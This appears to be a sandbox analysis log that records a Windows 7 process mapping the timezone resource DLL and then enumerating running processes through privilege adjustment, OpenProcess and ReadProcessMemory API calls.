filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3674
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3675
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3676
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3677
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3678
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3679
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3680
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3681
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3682
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3683
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3684
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Thread:
id = 124
os_tid = 0xa34
[0401.878] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0401.905] SetLastError (dwErrCode=0x0)
[0401.905] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x12de488, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12de390 | out: pulNumLanguages=0x12de488, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12de390) returned 1
[0401.906] RtlAllocateHeap (HeapHandle=0x120000, Flags=0x0, Size=0x8) returned 0x15da80
[0401.906] SetLastError (dwErrCode=0x0)
[0401.906] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x12de488, pwszLanguagesBuffer=0x15da80, pcchLanguagesBuffer=0x12de390 | out: pulNumLanguages=0x12de488, pwszLanguagesBuffer=0x15da80, pcchLanguagesBuffer=0x12de390) returned 1
[0401.906] RtlAllocateHeap (HeapHandle=0x120000, Flags=0x0, Size=0x8) returned 0x15da90
[0401.906] HeapFree (in: hHeap=0x120000, dwFlags=0x0, lpMem=0x15da80 | out: hHeap=0x120000) returned 1
[0401.906] RtlAllocateHeap (HeapHandle=0x120000, Flags=0x0, Size=0x20) returned 0x1a58a0
[0401.906] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x1a58a0, pulNumLanguages=0x12de488 | out: pulNumLanguages=0x12de488) returned 1
[0401.907] HeapFree (in: hHeap=0x120000, dwFlags=0x0, lpMem=0x1a58a0 | out: hHeap=0x120000) returned 1
[0401.922] SafeArrayGetElemsize (psa=0x1b06d0) returned 0x8
[0401.923] SafeArrayPutElement (psa=0x1b06d0, rgIndices=0x12ddcc0, pv=0x1a5878) returned 0x0
[0401.923] SafeArrayRedim (in: psa=0x1b06d0, psaboundNew=0x12ddcd8 | out: psa=0x1b06d0) returned 0x0
[0401.923] SafeArrayCopy (in: psa=0x1b06d0, ppsaOut=0x12ddc20 | out: ppsaOut=0x12ddc20) returned 0x0
[0401.925] malloc (_Size=0xb0) returned 0x2c3750
[0401.925] LoadLibraryW (lpLibFileName="NTDLL.DLL") returned 0x77880000
[0401.926] GetProcAddress (hModule=0x77880000, lpProcName="RtlInitUnicodeString") returned 0x778d5280
[0401.926] GetProcAddress (hModule=0x77880000, lpProcName="RtlFreeUnicodeString") returned 0x778d5610
[0401.926] GetProcAddress (hModule=0x77880000, lpProcName="NtSetSystemEnvironmentValue") returned 0x778d29e0
[0401.926] GetProcAddress (hModule=0x77880000, lpProcName="NtQuerySystemEnvironmentValue") returned 0x778d25e0
[0401.926] GetProcAddress (hModule=0x77880000, lpProcName="NtCreateFile") returned 0x778d1860
[0401.926] GetProcAddress (hModule=0x77880000, lpProcName="NtQuerySystemInformation") returned 0x778d1670
[0401.927] GetProcAddress (hModule=0x77880000, lpProcName="NtQueryDirectoryObject") returned 0x778d2440
[0401.927] GetProcAddress (hModule=0x77880000, lpProcName="NtQueryObject") returned 0x778d1410
[0401.927] GetProcAddress (hModule=0x77880000, lpProcName="NtOpenDirectoryObject") returned 0x778d1890
[0401.927] GetProcAddress (hModule=0x77880000, lpProcName="NtQueryInformationProcess") returned 0x778d14a0
[0401.927] GetProcAddress (hModule=0x77880000, lpProcName="NtQueryInformationToken") returned 0x778d1520
[0401.927] GetProcAddress (hModule=0x77880000, lpProcName="NtOpenFile") returned 0x778d1640
[0401.928] GetProcAddress (hModule=0x77880000, lpProcName="NtClose") returned 0x778d1400
[0401.928] GetProcAddress (hModule=0x77880000, lpProcName="NtFsControlFile") returned 0x778d16a0
[0401.928] GetProcAddress (hModule=0x77880000, lpProcName="NtQueryVolumeInformationFile") returned 0x778d17a0
[0401.928] malloc (_Size=0x18) returned 0x2bf020
[0401.928] GetCurrentThread () returned 0xfffffffffffffffe
[0401.928] OpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x28, OpenAsSelf=1, TokenHandle=0x12dda78 | out: TokenHandle=0x12dda78*=0x240) returned 1
[0401.928] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x12dda54 | out: lpLuid=0x12dda54*(LowPart=0x14, HighPart=0)) returned 1
[0401.930] SetLastError (dwErrCode=0x0)
[0401.931] AdjustTokenPrivileges (in: TokenHandle=0x240, DisableAllPrivileges=0, NewState=0x12dda50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0401.931] GetLastError () returned 0x514
[0401.931] CloseHandle (hObject=0x240) returned 1
[0401.931] malloc (_Size=0x18) returned 0x2beee0
[0401.931] SafeArrayPutElement (psa=0x1b00d0, rgIndices=0x12ddaf8, pv=0x1b0688) returned 0x0
[0401.931] SafeArrayPutElement (psa=0x1b0850, rgIndices=0x12ddaf8, pv=0x1b0688) returned 0x0
[0401.932] free (_Block=0x2beee0)
[0401.932] malloc (_Size=0x8000) returned 0x2c9a30
[0401.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2c9a30, Length=0x8000, ResultLength=0x0 | out: SystemInformation=0x2c9a30, ResultLength=0x0) returned 0xc0000004
[0401.933] free (_Block=0x2c9a30)
[0401.933] malloc (_Size=0x10000) returned 0x2c9a30
[0401.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2c9a30, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2c9a30, ResultLength=0x0) returned 0xc0000004
[0401.933] free (_Block=0x2c9a30)
[0401.933] malloc (_Size=0x18000) returned 0x2c9a30
[0401.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2c9a30, Length=0x18000, ResultLength=0x0 | out: SystemInformation=0x2c9a30, ResultLength=0x0) returned 0x0
[0401.936] _ui64tow (_Value=0x0, _Buffer="", _Radix=10) returned="0"
[0401.941] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="0") returned 1
[0401.942] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x120000, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0401.942] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0401.957] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0
[0401.958] CloseHandle (hObject=0x0) returned 0
[0401.959] _ui64tow (_Value=0x4, _Buffer="0", _Radix=10) returned="4"
[0401.963] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="4") returned 1
[0401.965] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x120000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Se䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0401.965] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0401.991] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0
[0401.991] CloseHandle (hObject=0x0) returned 0
[0401.992] _ui64tow (_Value=0x10c, _Buffer="4", _Radix=10) returned="268"
[0401.996] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="268") returned 3
[0401.997] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0401.997] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.022] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x10c) returned 0x0
[0402.022] CloseHandle (hObject=0x0) returned 0
[0402.047] _ui64tow (_Value=0x154, _Buffer="268", _Radix=10) returned="340"
[0402.054] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="340") returned 3
[0402.056] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.056] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.084] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x154) returned 0x0
[0402.085] CloseHandle (hObject=0x0) returned 0
[0402.086] _ui64tow (_Value=0x178, _Buffer="340", _Radix=10) returned="376"
[0402.090] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="376") returned 3
[0402.092] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243a4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.092] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.114] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x0
[0402.114] CloseHandle (hObject=0x0) returned 0
[0402.115] _ui64tow (_Value=0x184, _Buffer="376", _Radix=10) returned="388"
[0402.123] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="388") returned 3
[0402.124] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.124] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.146] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x0
[0402.146] CloseHandle (hObject=0x0) returned 0
[0402.147] _ui64tow (_Value=0x1ac, _Buffer="388", _Radix=10) returned="428"
[0402.152] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="428") returned 3
[0402.153] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243a4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.153] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.173] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0
[0402.173] CloseHandle (hObject=0x0) returned 0
[0402.174] _ui64tow (_Value=0x1d8, _Buffer="428", _Radix=10) returned="472"
[0402.181] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="472") returned 3
[0402.182] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.183] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.207] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0
[0402.207] CloseHandle (hObject=0x0) returned 0
[0402.208] _ui64tow (_Value=0x1e0, _Buffer="472", _Radix=10) returned="480"
[0402.215] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="480") returned 3
[0402.216] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.216] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.240] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0
[0402.240] CloseHandle (hObject=0x0) returned 0
[0402.241] _ui64tow (_Value=0x1e8, _Buffer="480", _Radix=10) returned="488"
[0402.247] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="488") returned 3
[0402.248] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.248] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.292] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0
[0402.292] CloseHandle (hObject=0x0) returned 0
[0402.293] _ui64tow (_Value=0x254, _Buffer="488", _Radix=10) returned="596"
[0402.298] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="596") returned 3
[0402.299] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.299] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.333] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x254) returned 0x0
[0402.333] CloseHandle (hObject=0x0) returned 0
[0402.335] _ui64tow (_Value=0x298, _Buffer="596", _Radix=10) returned="664"
[0402.340] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="664") returned 3
[0402.342] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.342] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.369] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x298) returned 0x0
[0402.369] CloseHandle (hObject=0x0) returned 0
[0402.370] _ui64tow (_Value=0x2c8, _Buffer="664", _Radix=10) returned="712"
[0402.374] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="712") returned 3
[0402.376] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.376] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.401] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0
[0402.401] CloseHandle (hObject=0x0) returned 0
[0402.402] _ui64tow (_Value=0x338, _Buffer="712", _Radix=10) returned="824"
[0402.406] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="824") returned 3
[0402.408] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.408] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.436] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0
[0402.436] CloseHandle (hObject=0x0) returned 0
[0402.437] _ui64tow (_Value=0x36c, _Buffer="824", _Radix=10) returned="876"
[0402.447] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="876") returned 3
[0402.448] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.448] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.475] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x36c) returned 0x0
[0402.475] CloseHandle (hObject=0x0) returned 0
[0402.476] _ui64tow (_Value=0x3fc, _Buffer="876", _Radix=10) returned="1020"
[0402.481] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1020") returned 4
[0402.482] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.482] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.506] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3fc) returned 0x0
[0402.506] CloseHandle (hObject=0x0) returned 0
[0402.507] _ui64tow (_Value=0x3d0, _Buffer="1020", _Radix=10) returned="976"
[0402.512] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="976") returned 3
[0402.514] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.514] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.535] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3d0) returned 0x240
[0402.535] GetLastError () returned 0x0
[0402.535] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0402.535] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffdb018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.535] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0402.536] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3327f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.536] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x332688, lpBuffer=0x12dd100, nSize=0x38, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0402.537] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0402.538] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0402.538] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffdb020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.538] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x331e60, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0402.538] malloc (_Size=0x3e) returned 0x2bd2c0
[0402.538] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3326c0, lpBuffer=0x2bd2c0, nSize=0x3c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2bd2c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.539] free (_Block=0x2bd2c0)
[0402.539] CloseHandle (hObject=0x240) returned 1
[0402.540] _ui64tow (_Value=0x410, _Buffer="976", _Radix=10) returned="1040"
[0402.545] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1040") returned 4
